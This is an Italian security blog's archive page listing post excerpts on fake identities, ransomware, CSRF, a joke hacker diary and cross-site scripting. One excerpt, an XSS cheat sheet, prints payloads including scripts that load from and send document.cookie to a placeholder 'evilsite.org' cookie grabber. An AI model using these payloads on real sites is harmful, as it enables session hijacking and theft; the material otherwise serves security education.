Archives

Category Archive for: ‘Sicurezza Informatica’

Fake Name Generator Logo

Nuova identità: ecco come generarla online

0

A volte capita che vogliamo registrarci ad un sito web solo per accedere ad un contenuto o per curiosità, e questo però chiede anche il codice fiscale di vostra nonna. Ecco come risolvere il problema. Ci sono alcuni siti web che pensano che obbligando gli utenti a lasciare i propri dati personali, potranno in seguito ricontattarli o comunque sfruttarli. La …

Read More
Virus Polizia Postale

Ransomware: ecco una vera e propria Minaccia informatica

0

Symantec ha pubblicato un rapporto sull’ aumento preoccupante dei ransomware: virus che ci chiedono i soldi in cambio dei nostri dati. Con l’evoluzione della tecnologia, spesso i profani non riescono a stare dietro a tutte le innovazioni e finiscono spesso col sottovalutare la pericolosità che si può celare nell’informatica. Symantec, nota azienda produttrice di antivirus e software per la sicurezza, …

Read More
Bruce Force Attack

[CSRF] Attacco Cross Site Request Forgery

0

In questo articolo parleremo di un attacco web che può risultare devastante: rientra nella categoria di attacchi SideJacking e viene conosciuto anche come CSRF o XSRF. Questa tipo di attacco, permette ad un malintenzionato di effettuare operazioni al posto della vittima. Che ti di operazioni parliamo? Potenzialmente, a seconda del sito vulnerabile (e delle sue funzioni ovviamente) può a nome …

Read More
Linux

Diario di un wanna be hacker

1

Questo racconto gira da molti anni in internet, essendo comunque divertente e potendoci essere qualcuno che ancora non ha raggiunto lo riproponiamo. In pratica, questo è il diario che descrive il duro passaggio da Windows a Gnu/Linux al fine di diventare hacker! Buona lettura e buon divertimento! Caro diario, giorno 1 ———————— Oggi ho deciso di installare Linux. Non si …

Read More
Phishing

Codici per trovare una XSS

0

Avevamo promesso qualche giorno fa, di darvi altri esempi su come trovare delle XSS in un sito web. Ecco quindi di seguito, una “cheat sheet” contenente dei codici utilizzati dai “Bug-Hunter” per controllare se un sito web soffre di Cross Site Scripting. Divertitevi! <script>alert(1);</script> <script>alert(‘XSS’);</script> <script src=”http://www.evilsite.org/cookiegrabber.php”></script> <script>location.href=”http://www.evilsite.org/cookiegrabber.php?cookie=”+escape(document.cookie)</script> <scr<script>ipt>alert(‘XSS’);</scr</script>ipt> <script>alert(String.fromCharCode(88,83,83))</script> <img src=foo.png onerror=alert(/xssed/) /> <style>@im\port’\ja\vasc\ript:alert(\”XSS\”)’;</style> <? echo(‘<scr)’; echo(‘ipt>alert(\”XSS\”)</script>’); ?> <marquee><script>alert(‘XSS’)</script></marquee> …

Read More
Phishing

[XSS] Guida Al Cross Site Scripting

2

In questa guida cercheremo di farvi capire il piu possibile sulle XSS ovvero sul Cross Site Scripting, una vulnerabilita facilmente trovabile (e spesso altrettanto facilmente fixabile) nei siti web. Il cross site scripting Fixare una xss Metodi usati dai crackers per sfruttare una XSS Il cross site scripting Il cross site scripting rientra nella categoria di attacchi “code injection”, ovvero “iniezione di …

Read More
Page 10 of 19« First...«89101112»...Last »